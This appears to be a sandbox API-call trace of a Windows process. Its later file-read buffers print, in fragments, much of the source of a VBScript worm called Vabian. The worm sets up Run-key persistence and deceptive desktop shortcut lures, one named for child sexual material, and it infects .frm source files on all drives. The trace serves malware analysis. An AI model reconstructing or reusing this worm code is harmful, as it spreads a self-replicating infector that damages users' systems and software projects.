FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Music\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x97\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12689
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=-237
LocalizedResourceName=@shell32.dll,-28995
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Music\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x97\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12689
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=-237
LocalizedResourceName=@shell32.dll,-28995
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCreateKeyExW |
Handle => 0x00000218 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 DataLength => 520 ValueName => CommonVideo Type => 1303824 |
FAILURE | 0x00000002 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00D\x00r\x00i\x00v\x00e\x00%\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\x00\x00 ValueName => ProfilesDirectory |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\x00\x00 ValueName => AllUsersProfile |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrGetDllHandle |
ModuleHandle => 0x7c9c0000 FileName => SHELL32 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCreateKeyExW |
Handle => 0x00000218 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegSetValueExW |
Handle => 0x00000218 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\\x00M\x00y\x00 \x00V\x00i\x00d\x00e\x00o\x00s\x00\x00\x00 ValueName => CommonVideo Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x00000218 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001b08d0 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users |
SUCCESS | 0x001b08d0 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents |
SUCCESS | 0x001b08d0 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\My Videos |
SUCCESS | 0x001b08d0 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Videos\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x97\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12690
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=-238
LocalizedResourceName=@shell32.dll,-28996
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Videos\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x97\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12690
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=-238
LocalizedResourceName=@shell32.dll,-28996
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Videos\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x97\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12690
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=-238
LocalizedResourceName=@shell32.dll,-28996
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtWriteFile |
Buffer => L\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00F\xcb@\x00\x00 \x00\x00\x00\x90\x9e\x04?\xac\x9f\xd3\x01\x90\x9e\x04?\xac\x9f\xd3\x01\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01\xcc$\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xad\x00\x14\x00\x1fP\xe0O\xd0 \xea:i\x10\xa2\xd8\x08\x00+00\x9d\x19\x00/C:\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00<\x001\x00\x00\x00\x00\x00GL\x0e\x05\x10\x00WINDOWS\x00&\x00\x03\x00\x04\x00\xef\xbe+G\xf5\x00GL\x0e\x05\x14\x00\x00\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\x00\x00\x16\x00B\x002\x00\xcc$\x00\x00FL\xd0\xbc \x00Vabian.VX\x00*\x00\x03\x00\x04\x00\xef\xbeGL\x0e\x05GL\x0e\x05\x14\x00\x00\x00V\x00a\x00b\x00i\x00a\x00n\x00.\x00V\x00X\x00\x00\x00\x18\x00\x00\x00C\x00\x00\x00\x1c FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | RegOpenKeyExW |
Handle => 0x00000216 Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | RegEnumKeyW |
Handle => 0x00000216 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | RegOpenKeyExW |
Handle => 0x0000021a Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9} |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | RegQueryValueExW |
Handle => 0x0000021a Data => 32 ValueName => DriveMask |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | RegCloseKey |
Handle => 0x0000021a |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | RegEnumKeyW |
Handle => 0x00000216 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 1 |
FAILURE | 0x00000103 | |
| 19:40:26,483 | 252 | RegCloseKey |
Handle => 0x00000216 |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0007 SectionHandle => 0x00000214 FileHandle => 0x00000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e094 SectionHandle => 0x00000214 ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e0b4 SectionHandle => 0x00000218 ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | RegOpenKeyExW |
Handle => 0x0000020e Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | RegEnumKeyW |
Handle => 0x0000020e Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | RegOpenKeyExW |
Handle => 0x0000021a Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9} |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | RegQueryValueExW |
Handle => 0x0000021a Data => 32 ValueName => DriveMask |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | RegCloseKey |
Handle => 0x0000021a |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | RegEnumKeyW |
Handle => 0x0000020e Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 1 |
FAILURE | 0x00000103 | |
| 19:40:26,493 | 252 | RegCloseKey |
Handle => 0x0000020e |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0007 SectionHandle => 0x0000020c FileHandle => 0x00000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e528 SectionHandle => 0x0000020c ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e548 SectionHandle => 0x00000218 ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0007 SectionHandle => 0x00000218 FileHandle => 0x00000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e528 SectionHandle => 0x00000218 ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e548 SectionHandle => 0x0000020c ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\windows\backup_vabian.sys DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => Rem VBS.W32.I-worm.Vabian
Rem Script Project Infector [pas,frm,cpp]
Rem By Psychologic aka Puppy
Rem Mailto : Psychologic@hot FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => mail.com
'sending filename
'x=msgbox(Wscript.ScriptName, 0, "Title")
'malware expires....
date2 = #06/01/2018#
date1 = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => Date 'get current date
'x = msgBox(date1,0,"sadd")
'x1 = msgBox(date2,0,"sad1")
'x2 = msgBox(diff,0,"diff")
Do while FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => true
If date1 < date2 Then
Exit Do
End If
WScript.Sleep 1000
Loop
On error resume next
Set executor = wscript.Cr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => eateObject("WScript.Shell")
Set fso = CreateObject("scripting.FileSystemObject")
Set drop = Fso.opentextfile(wscript.scriptful FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => lname, 1)
src = drop.readall
drop.close
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\"
executor.regwrite "HKEY_CLASSES_ROOT FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => \VXFile\DefaultIcon\","C:\PROGRA~1\INTERN~1\iexplore.exe,8"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptEngine\","VBScrip FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => t"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
executor.regwrite " FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => HKEY_CLASSES_ROOT\VXFile\Shell\Open\Command\","C:\WINDOWS\WScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regwrite "H FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => KEY_CLASSES_ROOT\VXFile\Shell\Play\Command\","C:\WINDOWS\COMMAND\CScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regw FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => rite "HKEY_CLASSES_ROOT\VXFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
executor.regwr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => ite "HKEY_CLASSES_ROOT\.VX\","VXFile"
executor.regwrite "HKEY_CLASSES_ROOT\VX\CLSID\","{B54F3741-5B07-11cf-A4B0-00AA004A55E8}"
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer =>
executor.regwrite "HKEY_CLASSES_ROOT\VX\OLEScript\"
fso.copyfile wscript.scriptfullname,"C:\windows\backup_vabian.sys"
fso. FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => copyfile wscript.scriptfullname,"C:\windows\Vabian.VX"
if fso.FolderExists("C:\Documents and Settings\All Users\Desktop") the FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => n
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\Documents and Sett FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => ings\All Users\Desktop\Sex-Vabian.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.VX")
msc.IconLo FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => cation = Shell.ExpandEnvironmentStrings("C:\windows\system32\mspaint.exe, 0")
msc.WindowStyle = 4
msc.Save
end if
if fso FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => .FolderExists("C:\windows\Desktop") then
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shel FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => l.CreateShortCut("C:\windows\Desktop\Sex-Children.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.V FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => X")
msc.WindowStyle = 4
msc.Save
end if
set opendroperfrm = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsour FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => cefrm = ""
oneline = ""
do while opendroperfrm.readline <> "'VabianMarker"
oneline = opendroperfrm.readline
frmformat = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => replace(oneline,chr(34),chr(34)&"&chr(34)&"&chr(34))
fullline = "? #1," & frmformat
allsourcefrm = allsourcefrm & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => fullline
loop
opendroperfrm.close
set opendropercpp = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsourcecpp = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,493 | 252 | NtReadFile |
Buffer => ""
oneline1 = ""
do while opendropercpp.readline <> "'VabianMarker"
oneline1 = ""
oneline1 = opendropercpp.readline
oneb FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => yone = len(oneline1)
for i = 1 to onebyone
read34 = mid(oneline1,i,1)
if read34 = chr(34) then
m = ",34"
else
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => m = ""
end if
all = all & m
next
cppformat1 = replace(oneline1,chr(34),"%c")
cppformat = replace(cppformat1,"\","\\" FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => )
fullline1 = "fprintf(mvbswe," & chr(34) & cppformat & "\n" & chr(34) & all & ");"
allsourcecpp = allsourcecpp & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => fullline1
all = ""
loop
opendropercpp.close
set opendroperpas = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
all FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => sourcepas = ""
oneline2 = ""
do while opendroperpas.readline <> "'VabianMarker"
oneline2 = ""
oneline2 = opendroperpas.rea FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => dline
fullline2 = "writeln (mvbswe,'" & oneline2 & "');"
allsourcepas = allsourcepas & vbcrlf & fullline2
loop
opendroper FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => pas.close
winfold = fso.getspecialfolder(0)
backpath = winfold & "\vabian.vbs"
executor.regwrite "HKLM\SOFTWARE\Microsoft FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => \Windows\CurrentVersion\Run\Vabian", "wscript.exe " & backpath & " %"
fso.copyfile wscript.scriptfullname, backpath
ranpay = i FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => nt(rnd * 9)+1
if ranpay > 5 then
set payload = fso.CreateTextFile("C:\payload.txt")
payload.write "VBS.Vabian" & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => "-------------" & vbcrlf
payload.write "Dear user ... " & vbcrlf & "I just want to tell you something" & vbcrlf
payload.wri FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => te "Your computer has been infected with virus,it called VBS.Vabian" & vbcrlf
payload.write "If you are an Programer, go look FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => at your project check all your frm or cpp or pas files" & vbcrlf
payload.write "Cos that is the victim" & vbcrlf & "Ok I have FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => to go now" & vbcrlf
payload.write "--------------------------------------------------" & vbcrlf
payload.write "Made by Psyc FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => hologic aka Puppy - Indonesian hip-hop singer"
payload.close
executor.run "C:\payload.txt"
end if
Set Drives=fso.drives FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer =>
For Each Drive in Drives
If drive.isready then
FindVictim drive
end If
Next
function FindVictim(path)
on error FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => resume next
Set Folder=fso.getfolder(path)
Set Files = folder.files
For Each File in files
If fso.GetExtensionName(file FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => .path)="frm" then
on error resume next
set readfrmmarker = fso.OpenTextFile(file.path,1, True)
frmmarker = readfrmmarker.r FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => eadline
frmreadall = readfrmmarker.readall
if frmmarker <> "Rem W32.hllp.Vabian" then
set readfrmmarker = fso.CreateTex FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => tFile(file.path, True)
readfrmmarker.write "Rem W32.hllp.Vabian" & vbcrlf & frmreadall & vbcrlf
readfrmmarker.write "Pri FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => vate Sub form_unload(cancel As Integer)" & vbcrlf
readfrmmarker.write "On Error GoTo err:" & vbcrlf
readfrmmarker.write FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => "Open " & chr(34) & "C:\vabian.vbs" & chr(34) & " for output as #1" & vbcrlf
readfrmmarker.write allsourcefrm & vbcrlf & "c FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => lose #1" & vbcrlf & "shell " & chr(34) & "C:\vabian.vbs" & chr(34) & vbcrlf
readfrmmarker.write "msgbox " & chr(34) & "Your FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => Program has been infected by Vabian virus Created by Psychologic" & chr(34) & ",VbInformation," & chr(34) & "W32.VBS.Vabian" & c FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => hr(34)
readfrmmarker.write vbcrlf & "exit sub" & vbcrlf & "err:" & vbcrlf & "End sub" & vbcrlf
readfrmmarker.close
en FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => d if
end if
